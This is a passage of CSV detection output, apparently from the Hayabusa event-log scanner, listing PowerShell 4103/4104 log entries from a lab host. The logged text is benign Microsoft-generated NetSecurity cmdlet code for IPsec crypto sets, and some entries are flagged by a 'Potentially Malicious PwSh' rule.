($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.612 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.612 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.614 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.615 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.615 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.616 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.616 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.659 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = 
'1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { 
[object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] 
[Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
